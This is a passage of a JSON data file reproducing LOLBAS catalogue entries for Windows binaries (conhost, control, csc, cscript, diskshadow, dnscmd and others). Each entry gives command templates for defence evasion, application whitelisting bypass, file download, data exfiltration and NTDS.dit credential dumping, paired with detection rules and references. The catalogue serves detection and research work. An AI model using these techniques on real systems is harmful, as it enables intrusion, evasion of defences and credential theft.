installation","aliases":[]},{"id":"lolbas:conhost-exe:0","toolId":"lolbas:conhost-exe","toolName":"Conhost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"conhost.exe {CMD}","description":"Execute a command line with conhost.exe as parent process","usecase":"Use conhost.exe as a proxy binary to evade defensive counter-measures","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\conhost.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"conhost.exe spawning unexpected processes"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml"}],"references":["https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/","https://twitter.com/Wietze/status/1511397781159751680","https://twitter.com/embee_research/status/1559410767564181504","https://twitter.com/ankit_anubhav/status/1561683123816972288","https://lolbas-project.github.io/lolbas/Binaries/Conhost/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:conhost-exe:1","toolId":"lolbas:conhost-exe","toolName":"Conhost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"conhost.exe --headless {CMD}","description":"Execute a command line with conhost.exe as parent process","usecase":"Specify --headless parameter to hide child process window (if applicable)","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\conhost.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"conhost.exe spawning unexpected processes"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml"}],"references":["https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/","https://twitter.com/Wietze/status/1511397781159751680","https://twitter.com/embee_research/status/1559410767564181504","https://twitter.com/ankit_anubhav/status/1561683123816972288","https://lolbas-project.github.io/lolbas/Binaries/Conhost/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:control-exe:0","toolId":"lolbas:control-exe","toolName":"Control.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"control.exe {PATH_ABSOLUTE}:evil.dll","description":"Execute evil.dll which is stored in an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1218.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\control.exe","C:\\Windows\\SysWOW64\\control.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"Control.exe executing files from alternate data streams"},{"type":"IOC","value":"Control.exe executing library file without cpl extension"},{"type":"IOC","value":"Suspicious network connections from control.exe"}],"references":["https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/","https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/","https://twitter.com/bohops/status/955659561008017409","https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items","https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/","https://lolbas-project.github.io/lolbas/Binaries/Control/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:control-exe:1","toolId":"lolbas:control-exe","toolName":"Control.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"control.exe {PATH_ABSOLUTE:.cpl}","description":"Execute .cpl file. A CPL is a DLL file with CPlApplet export function)","usecase":"Use to execute code and bypass application whitelisting","mitre":["T1218.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\control.exe","C:\\Windows\\SysWOW64\\control.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"Control.exe executing files from alternate data streams"},{"type":"IOC","value":"Control.exe executing library file without cpl extension"},{"type":"IOC","value":"Suspicious network connections from control.exe"}],"references":["https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/","https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/","https://twitter.com/bohops/status/955659561008017409","https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items","https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/","https://lolbas-project.github.io/lolbas/Binaries/Control/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:csc-exe:0","toolId":"lolbas:csc-exe","toolName":"Csc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"csc.exe -out:{PATH:.exe} {PATH:.cs}","description":"Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to the specified .exe path.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml"},{"type":"IOC","value":"Csc.exe should normally not run as System account unless it is used for development."}],"references":["https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/","https://lolbas-project.github.io/lolbas/Binaries/Csc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:csc-exe:1","toolId":"lolbas:csc-exe","toolName":"Csc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"csc -target:library {PATH:.cs}","description":"Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to a DLL file with the same name.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml"},{"type":"IOC","value":"Csc.exe should normally not run as System account unless it is used for development."}],"references":["https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/","https://lolbas-project.github.io/lolbas/Binaries/Csc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cscript-exe:0","toolId":"lolbas:cscript-exe","toolName":"Cscript.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"cscript //e:vbscript {PATH_ABSOLUTE}:script.vbs","description":"Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cscript.exe","C:\\Windows\\SysWOW64\\cscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Cscript.exe executing files from alternate data streams"},{"type":"IOC","value":"DotNet CLR libraries loaded into cscript.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cscript.exe.log"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Cscript/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:customshellhost-exe:0","toolId":"lolbas:customshellhost-exe","toolName":"CustomShellHost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"CustomShellHost.exe","description":"Executes explorer.exe (with command-line argument /NoShellRegistrationCheck) if present in the current working folder.","usecase":"Can be used to evade defensive counter-measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\CustomShellHost.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"CustomShellHost.exe is unlikely to run on normal workstations"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml"}],"references":["https://twitter.com/YoSignals/status/1381353520088113154","https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher","https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:datasvcutil-exe:0","toolId":"lolbas:datasvcutil-exe","toolName":"DataSvcUtil.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL}","description":"Upload file, credentials or data exfiltration in general","usecase":"Upload file","mitre":["T1567"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml"},{"type":"IOC","value":"The DataSvcUtil.exe tool is installed in the .NET Framework directory."},{"type":"IOC","value":"Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil."}],"references":["https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe","https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services","https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services","https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:desktopimgdownldr-exe:0","toolId":"lolbas:desktopimgdownldr-exe","toolName":"Desktopimgdownldr.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"set \"SYSTEMROOT=C:\\Windows\\Temp\" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL} /eventName:desktopimgdownldr","description":"Downloads the file and sets it as the computer's lockscreen","usecase":"Download arbitrary files from a web server","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\desktopimgdownldr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml"},{"type":"IOC","value":"desktopimgdownldr.exe that creates non-image file"},{"type":"IOC","value":"Change of HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PersonalizationCSP\\LockScreenImageUrl"}],"references":["https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/","https://lolbas-project.github.io/lolbas/Binaries/Desktopimgdownldr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:devicecredentialdeployment-exe:0","toolId":"lolbas:devicecredentialdeployment-exe","toolName":"DeviceCredentialDeployment.exe","name":"Conceal","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Conceal"],"command":"DeviceCredentialDeployment","description":"Grab the console window handle and set it to hidden","usecase":"Can be used to stealthily run a console application (e.g. cmd.exe) in the background","mitre":["T1564"],"privilege":"user","fullPath":["C:\\Windows\\System32\\DeviceCredentialDeployment.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"DeviceCredentialDeployment.exe should not be run on a normal workstation"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/DeviceCredentialDeployment/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dfsvc-exe:0","toolId":"lolbas:dfsvc-exe","toolName":"Dfsvc.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}","description":"Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)","usecase":"Use binary to bypass Application whitelisting","mitre":["T1127.002"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe","https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:diantz-exe:0","toolId":"lolbas:diantz-exe","toolName":"Diantz.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cab","description":"Compress a file (first argument) into a CAB file stored in the Alternate Data Stream (ADS) of the target file.","usecase":"Hide data compressed into an Alternate Data Stream.","mitre":["T1564.004"],"privilege":"user","fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml"},{"type":"IOC","value":"diantz storing data into alternate data streams."},{"type":"IOC","value":"diantz getting a file from a remote machine or the internet."}],"references":["https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz","https://ss64.com/nt/makecab-directives.html","https://lolbas-project.github.io/lolbas/Binaries/Diantz/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:diantz-exe:1","toolId":"lolbas:diantz-exe","toolName":"Diantz.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"diantz.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}","description":"Download and compress a remote file and store it in a CAB file on local machine.","usecase":"Download and compress into a cab file.","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml"},{"type":"IOC","value":"diantz storing data into alternate data streams."},{"type":"IOC","value":"diantz getting a file from a remote machine or the internet."}],"references":["https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz","https://ss64.com/nt/makecab-directives.html","https://lolbas-project.github.io/lolbas/Binaries/Diantz/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:diantz-exe:2","toolId":"lolbas:diantz-exe","toolName":"Diantz.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"diantz /f {PATH:.ddf}","description":"Execute diantz directives as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.","usecase":"Bypass command-line based detections","mitre":["T1036"],"privilege":"user","fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml"},{"type":"IOC","value":"diantz storing data into alternate data streams."},{"type":"IOC","value":"diantz getting a file from a remote machine or the internet."}],"references":["https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz","https://ss64.com/nt/makecab-directives.html","https://lolbas-project.github.io/lolbas/Binaries/Diantz/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:diskshadow-exe:0","toolId":"lolbas:diskshadow-exe","toolName":"Diskshadow.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"diskshadow.exe /s {PATH:.txt}","description":"Execute commands using diskshadow.exe from a prepared diskshadow script.","usecase":"Use diskshadow to exfiltrate data from VSS such as NTDS.dit","mitre":["T1003.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\diskshadow.exe","C:\\Windows\\SysWOW64\\diskshadow.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Child process from diskshadow.exe"}],"references":["https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/","https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:diskshadow-exe:1","toolId":"lolbas:diskshadow-exe","toolName":"Diskshadow.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"diskshadow> exec {PATH:.exe}","description":"Execute commands using diskshadow.exe to spawn child process","usecase":"Use diskshadow to bypass defensive counter measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\diskshadow.exe","C:\\Windows\\SysWOW64\\diskshadow.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Child process from diskshadow.exe"}],"references":["https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/","https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dnscmd-exe:0","toolId":"lolbas:dnscmd-exe","toolName":"Dnscmd.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll}","description":"Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.","usecase":"Remotely inject dll to dns server","mitre":["T1543.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\Dnscmd.exe","C:\\Windows\\SysWOW64\\Dnscmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml"},{"type":"IOC","value":"Dnscmd.exe loading dll from UNC/arbitrary path"}],"references":["https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83","https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html","https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp","https://twitter.com/Hexacorn/status/994000792628719618","http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html","https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:esentutl-exe:0","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o","description":"Copies the source VBS file to the destination VBS file.","usecase":"Copies files from A to B","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-